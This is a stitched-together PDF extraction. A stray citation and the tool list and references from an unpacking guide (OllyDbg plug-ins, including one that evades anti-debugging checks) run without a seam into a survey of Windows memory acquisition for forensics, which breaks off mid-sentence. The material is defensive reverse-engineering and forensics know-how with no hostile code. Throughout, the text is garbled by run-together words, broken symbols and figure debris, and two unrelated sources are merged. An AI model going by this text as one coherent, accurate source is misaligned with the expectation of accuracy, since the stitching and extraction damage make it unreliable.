Defeating HyperUnpackMe2 With an IDA Processor Module, Rolf Rolles III 
http://www.openrce.org/articles/full_view/28
The Art of Unpacking                                                                                                                     34   
 
  
7. TOOLS 
This section lists publicly available tools that reversers and malcode analysts can use to 
perform packer analysis and unpacking.  
 
Disclaimer: These tools are 3rd party tools; the author of this paper is not liable if any of these 
tools causes system instability or other issues that may impact your system. It is always 
advisable to run these tools in a test or a malware analysis environment. 
7.1.  OllyDbg 
http://www.ollydbg.de/  
A powerful ring 3 
debugger; used by 
reversers and malcode 
analysts. Its plug-in capabilities allow other 
reversers to create add-
ons to make reversing 
and unpacking much 
easier. 
7.2.  Ollyscript 
http://www.openrce.org/downloads/details/106/OllyScript
 
An OllyDbg plug-in which allows automation of setting/handling 
breakpoints, patching code/data, etc. thru the use of a scripting 
language similar to assembly language. It’s most useful in 
performing repetitive tasks and automate unpacking.  
 
  
7.3.  Olly Advanced 
http://www.openrce.org/downloads/details/241/Olly_Advanced
 
If packers contain armoring code against reversers, this 
OllyDbg plug-in is the armor to the reverser’s debugger. It 
has several options to bypass several anti-debugging techniques and hide OllyDbg from packers detecting the 
debugger, and much more.  
7.4.  OllyDump 
http://www.openrce.org/downloads/details/108/OllyDump
 
 
After a successful unpack, this OllyDbg plug-in can 
be used for process dumping and import table 
rebuilding.  
7.5.  ImpRec 
http://www.woodmann.com/crackz/Unpackers/Imprec16.zip
 
Finally, this is another tool for process dumping and 
import table rebuilding; it is a stand-alone tool, it 
offers one of the most excellent import table rebuilding capability. 
 
The Art of Unpacking                                                                                                                     35   
 
  8. REFERENCES  
 
Books: Reverse Engineering, Software Protection 
 
• Reversing: Secrets of Reverse Engineering. E.Eilam. Wiley, 2005. 
 
• Crackproof Your Software,  P.Cerven.No Starch Press, 2002 . 
 
Books: Windows and Processor Internals  
• Microsoft Windows Internal, 4
th Edition. M. Russinovich, D. Solomon, Microsoft Press, 
2005 
 
• IA-32 Intel® Architecture Software Developer's Manual. Volume 1-3, Intel Corporation, 
2006. 
http://www.intel.com/products/processor/manuals/index.htm  
 
Links: Windows Internals  
• ReactOS Project 
http://www.reactos.org/en/index.html
 
Source Search: http://www.reactos.org/generated/doxygen/  
 
• Wine Project 
http://www.winehq.org/  
Source Search: http://source.winehq.org/source/  
 
• The Undocumented Functions 
http://undocumented.ntinternals.net  
 
• MSDN 
http://msdn2.microsoft.com/en-us/default.aspx  
 
Links: Reverse Engineering, Software Protection, Unpacking  
• OpenRCE 
http://www.openrce.org
 
 • OpenRCE Anti Reverse Engineering Techniques Database 
http://www.openrce.org/reference_library/anti_reversing
 
 
• RCE Forums 
http://www.woodmann.com/forum/index.php  
 
• EXETOOLS Forums 
http://forum.exetools.com  
 
 A survey of main memory acquisition and analysis
techniques for the windows operating system
Stefan Vo  ̈mel*, Felix C. Freiling
Department of Computer Science, Friedrich-Alexander University of Erlangen-Nuremberg, Am Wolfsmantel 46, 91058 Erlangen-Tennenlohe,
Germany
article info
Article history:
Received 9 May 2011Received in revised form8 June 2011Accepted 11 June 2011
Keywords:
Memory forensicsMemory acquisitionMemory analysisLive forensicsMicrosoft windowsabstract
Traditional, persistent data-oriented approaches in computer forensics face some limita-tions regarding a number of technological developments, e.g., rapidly increasing storagecapabilities of hard drives, memory-resident malicious software applications, or thegrowing use of encryption routines, that make an in-time investigation more and more
difficult. In order to cope with these issues, security professionals have started to examine
alternative data sources and emphasize the value of volatile system information in RAMmore recently. In this paper, we give an overview of the prevailing techniques and methodsto collect and analyze a computer’s memory. We describe the characteristics, benefits, anddrawbacks of the individual solutions and outline opportunities for future research in thisevolving field of IT security.
a2011 Elsevier Ltd. All rights reserved.
1. Introduction
With the widespread use of computer systems and network
architectures, digital cyber crime has, unfortunately, aggra-vated as well. According to a recent publication by the Internet
Crime Complaint Center (2010) , a partnership between the
National White Collar Crime Center (NW3C) and the FederalBureau of Investigation (FBI), the number of complaints filedto the institution has almost gone up by the factor 20 withinless than a decade. In 2009, more than 336,000 reports aboutdifferent types of illicit activity such as online fraud, identitytheft, and economic espionage were registered. The yearlymonetary loss of complaints referred to law enforcement wasestimated to be nearly $560 million. As a survey by theComputer Security Institute (2009) shows, companies may
lose up to several hundred thousand dollars in the course ofan incident. In such cases, a forensic investigation of the
affected machines may prove helpful for reconstructing theactions that led to the security breach, finding relevant pieces
of evidence, and possibly taking legal actions against theadversary.
Traditional approaches in computer forensics mostly
described the acquisition and analysis of persistent system
data. Respected procedures usually involved powering off the
suspect machine, creating an exact bit-by-bit image of the
corresponding hard disks and other storage media, and per-forming a post-mortem examination of the collected infor-mation (U.S. Secret Service, 2006; U.S. Department of Justice,
2008 ). Obtaining a copy of physical Random Access Memory
(RAM) was, on the other hand, frequently neglected by firstresponders ( Shipley and Reeve, 2006; Hoglund, 2008 ), even
though guidelines stressed the necessity of securing digitalevidence with regard to the order of volatility , i.e., from the
volatile to the less volatile, as early as in 2002 ( Brezinski and
Killalea, 2002; Casey, 2004; Farmer and Venema, 2005 ). In the
face of ever-growing hard drive storage capabilities ( Oswald,
*Corresponding author .
E-mail addresses: stefan.voemel@informatik.uni-erlangen.de (S. Vo  ̈mel), felix.freiling@informatik.uni-erlangen.de (F.C. Freiling).
available at www.sciencedirect.com
journal homepage: www.elsevier.com/locate/diindigital investigation 8 (2011) 3 e22
1742-2876/$ esee front matter a2011 Elsevier Ltd. All rights reserved.
doi:10.1016/j.diin.2011.06.002
2010 ), and correspondingly, tremendous efforts to analyze
media in time ( Mrdovic et al., 2009; Walters and Petroni, 2007;
Shipley and Reeve, 2006 ) as well as a rising number of
memory-resident malicious software applications ( Moore
et al., 2003 ;Rapid7 LLC, 2004; Sparks and Butler, 2005; Bilby,
2006 ), the restoration of transient and system state-specific
information has, however, also moved more gradually into
the focus of current research, beginning with the Digital
Forensic Research Workgroup (DFRWS) challenge in 2005
(DFRWS, 2005 ).
This shift in practices has been driven and inspired by
several other developments, too: First, “pulling the plug” on
a company server may negatively affect productivity in certain
cases and cause substantial losses due to unexpected downtimes. Furthermore, depending on the configuration of thesystem, file system journals may be damaged during theshutdown process, or the machine may be difficult to restart.Thus, there is a demand to minimize interferences withexisting business and enterprise processes. Second, someprograms are explicitly designed to make no or preferably aslittle persistent changes as possible on the hard disk of theuser. Contemporary examples for this type of software are theMozilla Firefox web browser with its private browsing capability
(Mozilla Foundation, 2008; Aggarwal et al., 2010 ) or utilities
included in the PortableApps.com project ( Rare Ideas, 2010 ). For
this reason, forensic analysts must adapt their strategies andalso search in volatile system storages for traces and dataremnants, including usernames, passwords, and text frag-ments. Moreover, many modern operating systems includesupport for file or even full disk encryption ( Microsoft
Corporation, 2009; Apple Inc., 2010; Saout, 2006 ). Similar
functions are provided by freely-available open source tools,e.g., TrueCrypt (TrueCrypt Foundation, 2010 ), or commercial
products such as SafeGuard Easy (Sophos Plc, 2010 )o rPGP(PGP
Corporation, 2010 ). Because of the transparent design and ease
of use of these software products, security professionals arelikely to face an increasing number of encrypted drives thatmake traditional investigations infeasible ( Getgen, 2009 ).
Restoring a cryptographic key from memory might be the onlypossibility to get access to the protected data area in this case.The same holds true for packed malicious binaries. Malwarewriters typically employ compression, armoring, and obfus-cation techniques to make reverse engineering and staticanalysis of their code more difficult ( Sharif et al., 2009; Rolles,
2009; Brosch and Morgenstern, 2006; Young and Yung, 2004 ).
Memory inspection is a viable solution to cope with these
issues and extract the unpacked and decrypted executable
directly from RAM.
As can be seen, a myriad of valuable information is stored
in volatile memory that is usually lost when the target
computer is powered off. Failing to preserve its contents maythus destroy a significant amount of evidence.
1.1. Motivation for this paper
Over the last 5 1/2 years, considerable research has beenconducted in the field of memory forensics, and variousmethods have been published for capturing and examiningthe volatile storage of a target machine. However, manytechniques solely apply to specific versions of operatingsystems and architectures or only work under certain condi-
tions. Moreover, depending on the technology used, the reli-
ability and trustworthiness of generated results may vary. Forthese reasons, security professionals must have a thoroughunderstanding of the capabilities and limitations of therespective solutions in order to successfully retrieve pieces ofevidence and complete a case. A complete description of thecurrent state of the art appears to be missing at the time of thiswriting though, restricting (research) activities in this area toa number of renowned experts.
In this paper, we give a comprehensive and structural
overview of proven approaches for obtaining and inspecting
a computer’s memory. We explain the technical foundation of
existing tools and methodologies and outline their individualstrengths and weaknesses. Based on these illustrations,security analysts and first responders may choose anadequate acquisition and analysis strategy. In addition, wegive an extensive summary of the relevant literature. Thisreview serves as a good starting point for own future studies.
Please note that our explanations refer to the product
family of Microsoft Windows operating systems. We assume
that due to their high popularity and dominant market posi-tion ( Net Applications, 2010 ), investigators are particularly
likely to face Windows-based machines in practice. In addi-tion, as we will see, a deep knowledge of internal systemstructures is required to collect digital evidence from a volatilestorage. Covering other platforms such as Linux or Mac OS istherefore out of the scope of this paper. Interested readers arereferred to Movall et al. (2005) and Suiche (2010) for more
information on these topics.
1.2. Outline of the paper
This paper is outlined as follows: In Section 2, we briefly
describe the memory management process and give anoverview of the most important data structures that arerequired for this task. Current techniques and methods forcreating a memory image from the target system are pre-
sented in Section 3, followed by a detailed illustration of the
different investigative procedures in Section 4. A special
framework for memory analysis activities, Volatility , is subject
of Section 5. We conclude with a summary of our work and
indicate opportunities for future research in this area in
Section 6.
2. Technical background
Modern multi-tasking operating systems typically do notaccess physical memory directly, but rather operate on anabstraction called virtual memory . This abstraction of physical
RAM needs specific hardware support (the so-called Memory
Manager orMemory Management Unit ) and offers several
inherent advantages, e.g., the possibility of providing each
process with its own protected view on system memory as
well as monitoring and restricting read and write activitieswith the help of privilege rules ( Intel Corporation, 2011 ). The
layout between the virtual and physical address space maydiffer though, and blocks of virtual memory do not necessarilymap to contiguous physical addresses as illustrated in Fig. 1 .digital investigation 8 (2011) 3 e22 4
2.1. Memory address space layout
On Microsoft Windows operating systems, each process has
its own private virtual address space that is non-accessible to
other running applications unless portions of memory areexplicitly shared. Thereby, collisions and privilege violationsbetween different executables are prevented.
A 32-bit /C286 user process is equipped with 2 GB of virtual
memory by default ( Russinovich et al., 2009 ). The other half of
the address space ( 0x80000000 toFFFFFFFF ) is reserved for
system usage.
1Kernel space is shared between and available
to all system components. Thus, as Russinovich et al. (2009, p.
17)argue, it is vital that kernel-mode applications “be care-
fully designed and tested to ensure that they don’t violatesystem security and cause system instability”. Criticalmemory regions include, for example, the system pools thatstore volatile data that must not/may be paged out to harddisk as well as the process page tables that are required forvirtual-to-physical address translation as we will see in thefollowing section (see also Fig. 2 ).
2.2. Virtual address translation
As we have already explained, programs usually operate onvirtual memory regions only. Therefore, to manipulate therespective physical data, the Memory Manager mustcontinuously translate ( map) virtual into physical addresses.
This procedure works as follows ( Intel Corporation, 2011;
Russinovich et al., 2009 ): At the hardware level, volatile
storage is organized into units called pages . A common size of
such pages is 4 kB on /C286-platforms. To reference a page, theoperating system implements a two-level approach: Forevery process, the operating system maintains a page direc-
tory that saves pointers ( Page Directory Entries ,P D E s ,4b y t e s
each, containing a pointer and several flags) to 1,024 differentpage tables . Page tables, in turn, contain up to 1,024 links ( Page
Table Entries ,P T E s ,4b y t e se a c h )t ot h ec o r r e s p o n d i n gp a g ei n
main memory. Thus, in order to translate a virtual toa physical address, the Memory Manager first needs torecover the base address of the page directory. It is stored intheCR3 register of the processor and is reloaded from the
_KPROCESS block of the process at every context switch.
2The
first 10 bits of the virtual address can then be used as anindex into the page directory to retrieve the desired PDE.
With the help of the PDE and the page table index , i.e., the
subsequent 10 bits of the virtual address, the page table and
PTE in question are identified in the next step. To find theappropriate page and data in RAM eventually, the PTE andthe 12-bit byte index of the virtual address are parsed. A
summary of the entire process is presented in Fig. 3.
2.3. Paging
With respect to the address translation sequence outlined inthe previous section, we have implicitly assumed that therequested information is always available in main memory.
However, in some cases, the total amount of virtual memory
that is consumed by running processes is larger than the sizeof the entire physical storage. To cope with these scenarios,the operating system needs to temporarily swap out ( page )
memory contents to hard disk in order to free required space.When a thread attempts to operate on a swapped-out page,Virtual Memory
Physical Memory
Fig. 1 eMapping Virtual-to-Physical Memory (Source: Based on Russinovich et al., 2009 , p. 15).
1For reasons of simplicity, we assume that advanced memory
management features such as large address spaces, Address
Windowing Extension (AWE), and Physical Address Extension(PAE) are turned off. For more information on these concepts as
well as details about the 64-bit address space layout, please refer
toRussinovich et al. (2009) .2The kernel process ( _KPROCESS ) block is part of a larger
structure, the executive process ( _EPROCESS ) block, that serves as
an internal representation for a Windows process. We will illus-trate the _EPROCESS block in more detail in the memory analysis
section of this paper. Further information can also be found in thework of Russinovich et al. (2009) .digital investigation 8 (2011) 3 e22 5
64-K B no access area
Ke r n e la n de x e c u t i v e
HAL
B oot drivers
Process page tables
Hyp e rsp ace
System cache
Paged pool
Nonpaged pool
Re s e rve dfo r
HAL usag eA ppplication code
Glo b al variab le s
Per-thread stacks
DLL codeUse r
A ddress
Sp ace
(2 GB)
System
A ddress
Sp ace
(2 GB)
Fig. 2 eVirtual Address Space Layout (Source: Based on Russinovich et al., 2009, p. 738).
Fig. 3 eVirtual-to-Physical Address Translation (Source: Russinovich et al., 2009 , p. 763).digital investigation 8 (2011) 3 e22 6
the memory management unit generates a page fault interrupt
that is handled by the operating system such that the
requested information can be transferred back into RAM.
Whether or not a virtual address has been paged to disk is
indicated by the Valid flag, the least significant bit, of a PDE or
PTE. When it is set to 1, the entry is regarded as valid, and therespective data is accessible in memory. In contrast, when theflag is cleared and both the Transition (11) and Prototype (10) bit
are set to 0, an address in a page file is referenced (see Fig. 4 ).
The default page file pagefile.sys is saved in the root
directory on the partition the operating system is installedon. However, in total, up to 16 different page files with
a maximum size of 4,095 MB each can be supported on
/C286-based platforms. The name and location of the files are
specified in the registry string HKLM\SYSTEM\CurrentCon-
trolSet\ Control\Session Manager \Memory Management\PagingFiles , a field in the PTE of the virtual address, the
Page File Number (PFN, bits 1 to 4), denotes the current file in
use.
Please note that we have only given a brief overview of the
flags and elements of a PDE and PTE, respectively. A more
detailed explanation of the individual components and attri-butes can be found in the work of other authors ( Russinovich
et al., 2009; Savoldi and Gubian, 2008; Kornblum, 2007b;
Maclean, 2006 ). The concepts described in this section need
to be thoroughly understood though, because they form thebasis for many memory acquisition and analysis tools pre-sented in later parts of this paper.
3. Acquisition of volatile memory
Techniques for capturing volatile data are conventionallydivided into hardware- and software -based solutions in the
literature (e.g., see Vidas, 2006, 2010; Maclean, 2006; Garcia,
2007; Libster and Kornblum, 2008 ). While the latter ones
depend on functions provided by the operating system,
hardware-based approaches directly access a computer’smemory for creating a forensic image and, therefore, havelong been regarded to be more secure and reliable. A publi-cation by Rutkowska (2007) indicates, however, that these
assumptions no longer hold true. Moreover, several concepts
that have been proposed more recently rely on a combination
of both hardware and software mechanisms and cannot beclearly categorized with the existing terminology ( Libster and
Kornblum, 2008; Halderman et al., 2009 ). For this reason, we
believe that a classification solely on implementation-specificattributes is obsolete and is not capable of properly charac-terizing the latest developments any more.
A more viable suggestion is assessing the different tech-
nologies with respect to the requirements that are necessaryto obtain a (sound) memory copy of the target machine. Threemajor criteria identified by Schatz (2007a,b) are the fidelity of
a generated image, the reliability of produced results, and the
availability of the used mechanism. Fidelity enforces that the
created image is “a precise copy [of] the original host’smemory” ( Schatz, 2007a , p. S128). It depends on the “atom-
icity” of the snapshot (which is not further defined) as well asthe integrity of the host OS’s memory and unallocatedmemory regions. Reliability dictates that either a trustworthyresult is produced or none at all. Finally, availability stipulates
that the method must be “working on arbitrary computers (or
devices)” ( Schatz, 2007a , p. S128).
Inspired by this work, we define and adapt the following
two factors atomicity and availability for our evaluation. The
latter refers to the applicability of a certain technique onarbitrary system platforms for any given scenario. Moreprecisely, a technique that is characterized by a high avail-ability does not make any assumptions about particular pre-incident preparatory measures or pre-configurations andcan be applied even without detailed knowledge about theexecution environment. Atomicity, on the other hand, intui-
tively reflects the demand to produce an accurate and
consistent image of a host’s volatile storage. In more detail, anatomic snapshot is a snapshot obtained within an “uninter-rupted” atomic action in the sense of a critical section as it is used
in operating systems and concurrent programming (Lynch et
al., 1993) . It is free of the signs of concurrent system activity.
Based on these definitions we are able to broadly classify
and compare the most common memory acquisitionapproaches. The corresponding decision matrix is visualizedinFig. 5 .
Please note that the exact positioning of the methods
within the fields of the matrix may certainly be subject todiscussion at parts and is not the primary intention of theauthors. Likewise, we acknowledge that the selected dimen-sions do not yet describe the characteristics of the differenttechnologies in their entirety. In particular, our illustrationdoes not adequately reflect the aspect of what Schatz’ callsreliability , but what we would refer to as correctness ,i n
compliance with forensic guidelines (e.g., see ScientificWorking Group on Digital Evidence ( SWGDE), 2009 ). A given
procedure would therefore be regarded as “correct” if the
content of the image file results from an assignment of the
content of the target system’s memory.
3Proving the correct-
ness of this operation is a non-trivial task though, because
results can generally not be reproduced due to the volatilenature of the collected information (see Sutherland et al.,
2008 ).
In spite of the issues outlined above, we believe that our
model serves as an initial attempt to formalize the memoryacquisition process and is capable of giving investigatorsa good insight into when (not) to choose a specific solution.Vital points to keep in mind are especially:
/C15An ideal acquisition method is characterized by both a high
atomicity and availability and is therefore located in the
right upper corner of the matrix.
/C15Techniques that are listed in the right half of the matrix
must generally be favored upon techniques that are groupedon the left side, because they are superior concerningatomicity (and possibly availability as well).
3More formally, correctness means that the value of every
individual bit of the created image file results from an assignment
of the value of the corresponding bit of the target system’smemory (and no other value). Note that since this definition does
not refer to the specific time of the assignment, correctness does
not imply atomicity (and vice versa).digital investigation 8 (2011) 3 e22 7
/C15Methods that are located in the bottom field on the left side
of the matrix (currently: none) are generally not suitable for
obtaining volatile data in a forensically sound manner and
must not be considered further.
/C15Approaches that are categorized in the right bottom field ofthe matrix are applicable for scenarios where an investi-gator has sufficient time for pre-incident preparation.
/C15Techniques that are listed in the right upper field of thematrix are especially suited for smoking gun situations, i.e.,
where little time between the incident and investigationphase has passed.
In the following, we describe the different approaches in
detail and outline their individual benefits, peculiarities, anddrawbacks.
3.1. Memory acquisition using a dedicated hardware
card
One of the first propositions for obtaining a forensic image of
a computer’s RAM storage was the use of a special hardwarecard. Carrier and Grand (2004) presented a proof-of-concept
(PoC) solution called “Tribble” that makes use of DirectMemory Access (DMA) operations to create a copy of physical
memory, thereby bypassing possibly subverted structures of
the operating system. The card is installed as a dedicated PCI
device and is capable of saving volatile information to anattached storage medium. Upon pressing an external switch,the card is activated, and the imaging procedure is initiated.During this process, the CPU of the target host is temporarilysuspended to prevent an attacker from executing maliciouscode and illegitimately modifying the status of the system.Once all operations are completed, control is given back to theoperating system, and the acquisition card returns to an idlestate again. Two less known but comparable implementationsare proposed by Petroni et al. (2004) with their “Copilot”
prototype and BBN Technologies (2006) in the form of “FRED”,
theForensic RAM Extraction Device .
As the described solutions do not rely on functions
provided by the operating system, they are assumed to begenerally suitable for acquiring an accurate image of volatilememory. Since the processor of the host in question issuccessfully halted, the imaging operation can be atomicallycompleted without interference by other processes as well.Last but not least, because all information is directly retrievedfrom physical RAM, the procedure is believed to act outside
Ideal Acquisition
Technique
Kernel Level
Applications
Hardware Bus-Based
TechniqueCold Booting
Hibernation File-
Based TechniqueUser Level
Applications
Crash Dump
TechniqueVirtualization
Hardware Card-
Based TechniqueOperating
System Injection
AtomicityAvailability
high
high low
low
Fig. 5 eClassification of Memory Acquisition Techniques (Source: Based on Schatz, 2007b ).Page File Offset Protection Page File Number 0ValidPrototypeTransition
Fig. 4 eInvalid Page Table Entry (PTE) (Source: Based on Russinovich et al., 2009 , p. 775).digital investigation 8 (2011) 3 e22 8
the view of malicious applications such as rootkits, resulting
in a “true” picture of a target’s memory ( Kornblum, 2006 ).
Rutkowska (2007) has, however, recently proven that it is
possible to present a different view of physical memory to the
peripherals by reprogramming the chipset of the NorthBridge.Due to this innovation, several authors conclude that hard-ware cards can no longer be fully trusted and must not beregarded as forensically sound any more, making the devel-opment of more robust and reliable memory collecting tech-niques necessary ( Libster and Kornblum, 2008; Ruff, 2008;
Rutkowska, 2007 ).
In addition to these concerns, it is also important to
emphasize that a PCI card must be set up prior to its use. This
characteristic limits its application to special scenarios only.Carrier and Grand (2004 , p. 12) clarify that “the device has not
been designed for an incident response team member to carryin his toolkit”, but “rather needs to be considered as part ofa forensic readiness plan”. According to the authors, a card isthus most beneficial when installed on (business-)criticalservers, “where an attack is likely and a high-stake intrusioninvestigation might occur”. Alternative options for deploy-ment are, for instance, within a honeypot environment.
4
Thereby, it is possible to capture volatile information after
a machine has been compromised and learn more about the
tools, tactics, and motives of adversaries.
3.2. Memory acquisition via a special hardware bus
As an alternative to PCI cards, several authors suggest readingvolatile memory via the IEEE 1394 ( FireWire ) bus ( Dornseif and
Becher, 2004; Becher et al., 2005 ). A corresponding forensic-
related application is described by Piegdon and Pimenidis
(2007) . While the original code targets Linux and Mac OS
platforms, Boileau (2006b, 2008), Panholzer (2008) , and Bo ̈ck
(2009) demonstrate the feasibility of the approach for
different versions of Microsoft Windows. Ruff (2008 , p. 84)
adds that “any hardware bus can potentially be used forphysical memory access”. For instance, a proof-of-conceptutility that illustrates Direct Memory Access (DMA) opera-tions with the help of the PCMCIA (PC Card) bus was publishedat the ShmooCon 2006 conference ( Hulton, 2006 ). The sample
code has, however, not been published yet.
Retrieving volatile information via the IEEE 1394 bus can
address some of the issues we have outlined in the previoussection. For instance, the interface is present by default ina great part of systems, especially laptops. However, asVidstrom (2006) points out, the use of the technique may
cause random system crashes and similar reliability problemswhen accessing regions in the Upper Memory Area (UMA).Other authors have also indicated inconsistencies aftercomparing created images with raw memory dumps ( Carvey,
2007; Boileau, 2006a ). For this reason, similar to the hardware
card-oriented approach illustrated above, FireWire-based
techniques are not sufficiently reliable to obtain a precise
copy of a computer’s RAM.3.3. Memory acquisition with the help of virtualization
With the help of virtualization, it is possible to emulate
complete, isolated, and reliable system environments, so-called virtual machines , on top of a host computer ( Smith and
Nair, 2005 ). A special software layer, the virtual machine
monitor (VMM), is responsible for sharing as well as managing
and restricting access to the available hardware resources. Byemulating replicas of the different physical components, eachvirtual machine is equipped with its own virtual processor,
memory, graphics adapter, network and I/O interface and may
run in parallel to other guest systems .
One exceptional characteristic of a virtual machine is its
capability to be suspended, i.e., to pause its execution process.Thereby, the state of the guest operating system is tempo-rarily frozen, and its virtual memory is saved to hard disk onthe underlying host. For instance, in the case of a VMware-
based machine, all volatile data is saved to a .vmem file located
in the working directory of the virtual machine ( VMware, Inc.
2010) . Thus, by simply copying the respective file, an
atomically-generated snapshot of main memory can be easilyretrieved.
In 2007, Carvey (2007, p. 95 ) pointed out that “virtualization
technologies do not seem to be widely used in systems thatrequire the attention of a first responder”. With the growingimportance of Internet-hosted services, this situation is likelyto change though, and investigators will increasingly have toexamine incidents on virtual machines. With respect to thesescenarios, the memory acquisition approach is forensicallysound and only requires little effort.
3.4. Memory acquisition using software crash dumps
All versions of Microsoft Windows 2000 and above can beconfigured to write debugging information, so-called memory
dump files , to hard disk when the machine unexpectedly stops
working ( Microsoft Corporation, 2010e ). In case of a critical
failure, the system state is frozen, and the main memory aswell as relevant CPU information are saved in the system rootdirectory for later examination. Preserving the contents ofprocessor registers during this operation is a unique charac-teristic of this method ( Russinovich et al., 2009; Carvey, 2007 ).
5
A dump file can then either be opened with the Microsoft
Debugging Tools for Windows (Microsoft Corporation, 2010a )o r
be manually analyzed as explained by Schuster (2006a, 2008a) .
With regard to a forensic investigation, the system service
may be intentionally interrupted by using a third-partyapplication ( Microsoft Corporation, 2010g; Open System
Ressources, 2009 ) or the built-in CrashOnCtrlScroll feature. In
the latter case, the dump is generated upon pressing thekeyboard shortcut Right Ctrl þScrollLock þScrollLock
(Microsoft Corporation, 2010d ). It is important to note that this
capability is disabled by the operating system by defaultthough. Activation requires editing a certain value in theWindows registry ( Russinovich et al., 2009 ), a subsequent
4A honeypot is “an information system resource whose value
lies in unauthorized or illicit use of this resource” ( Spitzner,
2003b,a ). It acts as an electronic decoy for studying the behavior
of (Internet) miscreants ( Honeynet Project, 2004).5We assume the system is configured to save at least a full
kernel memory dump. For more information on this subject,
please refer to Microsoft Corporation (2010e) .digital investigation 8 (2011) 3 e22 9
reboot,6and only works with PS/2 keyboards initially. For
universal serial bus (USB) devices, a separate hotfix must be
installed ( Microsoft Corporation, 2010f ). Due to these modifi-
cations, the applicability of the technique is forensically onlysuitable in specific situations, analogously to the use ofa dedicated PCI card as explained in Section 3.1. Moreover,
even though the memory snapshot is atomically created byhalting the processing unit, parts of the system page file areoverwritten during this operation ( Russinovich et al., 2009 ).
Compared to other approaches, the acquisition technique istherefore more invasive and leads to a higher degree ofcontamination on the target system.
3.5. Memory acquisition with user level applications
Especially at the beginning of memory-related forensicresearch, various software solutions have been published bydifferent third parties to acquire a copy of physical memory
directly from user space. A prominent example is Data-Dumper
(dd) by Garner (2009) which is part of the Forensic Acquisition
Utilities (FAU) suite. When run with administrative privileges,
dd invokes the internal \\.\Device\PhysicalMemory section
object to create a full memory dump of the target machine
(Crazylord, 2002 ). Due to security reasons, user level access to
this object was restricted in Windows Server 2003 and lateroperating systems though ( Microsoft Corporation, 2010b ). With
regard to the configuration of modern computer platforms, thetechnique is thus only of very limited value to date.
Rather than creating a (much larger and more time-
consuming) forensic duplicate of the entire volatile storage of
a host, several other utilities permit saving the address spaceof a single process: With PMDump , it is possible to “dump the
memory contents of a process to a file” ( Vidstrom, 2002 ). The
Process Dumper utility (PD) by Klein (2006b) obtains a process’s
environment and state by retrieving the data and codemappings of an executable. Since all collected information isredirected to standard output by default, the final image canbe easily transferred over a remote connection for furtherinvestigation, e.g., with netcat (nc), a freely-available network
administration utility ( Craton, 2009 ).
7
Both PMDump and Process Dumper also have various
drawbacks though: First, they are closed source and usea proprietary data format that make the development ofadditional parsing tools more difficult. Second, as theprograms require the specification of a process ID, a corre-sponding process listing utility must be run in the first place.This operation further affects the level of contamination onthe target host, however.
As the techniques described above neither rely on specific
hardware setups or devices nor do they require a pre-definedsystem configuration, they are generally suitable for most
incident scenarios and permit capturing a forensic image evenin case a first responder only has little time for preparation.However, while the imaging process is comparatively easy to
perform, the approaches still suffer from various inherentweaknesses: First, as we have already indicated, manyprograms only work on specific operating systems or arebound to specific architectures, e.g. the /C286 32-bit platform.
Second, as all applications must be loaded into memory beforethey can be executed, valuable information may be destroyedbefore it can be preserved. Sutherland et al. (2008) have shown
in a study that the impact of the tools on a target machine canbe significant. What is worse, other processes are usually notimpeded from altering the volatile storage during the imaging
operation, resulting in a potentially non-atomic and “fuzzy
snapshot” ( Libster and Kornblum, 2008 , p. 14) of the source
data. Last but not least, as all methods depend on functionsprovided by the operating system, they are vulnerable tosubversion. A rootkit might, for instance, deny direct access tothe physical memory object or return a modified representa-tion of RAM during the image generation operation in order toevade detection ( Vidas, 2006; Bilby, 2006; Sparks and Butler,
2005 ). Although these types of manipulations are likely to
indicate the presence of a malicious software application tothe eyes of a skilled analyst ( Kornblum, 2006 ), relying on an
untrusted operating system eventually “decreases the reli-ability of the evidence” ( Carrier and Grand, 2004 , p. 6), too.
3.6. Memory acquisition with kernel level applications
To mitigate the limitations of user space acquisition utilitiesdescribed in the previous section, software vendors increas-ingly provide kernel level drivers to create a forensic image of
physical memory. Freely-available distributions include
Mantech’s Memory DD (mdd, ManTech CSI, Inc., 2009 ), Moon-
sols’ Windows Memory Toolkit (MoonSols, 2010 ), and Memoryze
by Mandiant ( Mandiant, 2010 ). Commercial alternatives are
offered by Guidance Software ( WinEn which is a part of EnCase ,
Guidance Software (2010) ), AccessData (Forensic Toolkit,
AccessData (2010) ), GMG Systems (KnTDD which is part of the
KnTTools, GMG Systems, Inc. (2007) ), and HBGary ( Fastdump
Pro, HBGary (2009) ). Even though the different solutions are
usually available for various versions of the Windows productfamily, they still cannot overcome the inherent weaknesses
we have already outlined. These include manipulations due to
concurrently running (system) processes and, consequently,a not sufficiently precise representation of a host’s memory aswell as the possibility of falling prey to a compromise attempt(see Section 3.5).
In order to cope with these concerns, Libster and Kornblum
(2008) propose integrating the capturing mechanism as an
operating system module into the system core which is loadedat boot time and invoked by a special keyboard trigger.According to the authors, distinctive characteristics of themodule would be the capability to halt active system processes,thereby ensuring atomic operations. In addition, support for
several storage dump locations, e.g., a remote network drive or
an externally attached media, is encouraged. For increasedsecurity, the use of hardware-side, read-only memory flags orencrypted Trusted Platform Modules (TPMs ( Group, 2007 )) is
suggested. These guarantee the integrity of the imaging oper-ation and prevent attacks on the executing code.
6A technique for omitting the mandatory reboot of the oper-
ating system was outlined by Ruff (2008) .
7Netcat does not establish an encrypted communication
channel by default. To securely transfer data over the network,
the connection can be tunneled over the SSH ( Secure Shell )
protocol. Alternatively, the cryptcat implementation may be used
as well. For more information on these topics, please see Farmer
and Venema (2005) .digital investigation 8 (2011) 3 e22 10
3.7. Memory acquisition via operating system injection
Schatz (2007a) has introduced a proof-of-concept application
called Body-Snatcher which injects an independent operating
system into the possibly subverted kernel of a target machine.
By freezing the state of the host computer and solely relyingon functions provided by the acquisition OS, an atomic andreliable snapshot of the volatile data may be created. Thepresented prototype is, however, platform-specific to a highdegree due to its low level approach and high complexity. In
addition, it is limited to single processor mode at the time of
this writing, consumes a significant amount of memory, andonly supports the serial port for I/O operations. Therefore,even though the concept is very promising, its technicalconstraints still need to be resolved, before it can be trulyapplied in real-world situations.
3.8. Memory acquisition via cold booting
Another encouraging approach has been outlined byHalderman et al. (2009) . It is based on the observation that
volatile information is not immediately erased after poweringoff a machine, but may still be recovered for a non-negligibleamount of time ( Chow et al., 2005 ). By artificially cooling
down the respective RAM modules, e.g., with liquid nitrogen,remanence times may even be substantially prolonged. The
target machine can then be restarted ( cold booted ) with
a custom kernel to access the retained memory in the next
step. The usability of this approach has been proven ina number of recent works: Vidas (2010) has published AfterLife ,
a proof-of-concept demonstration that copies the contents ofphysical RAM to an external storage medium after rebooting.Chan et al. (2008, 2009) implemented a special booting device
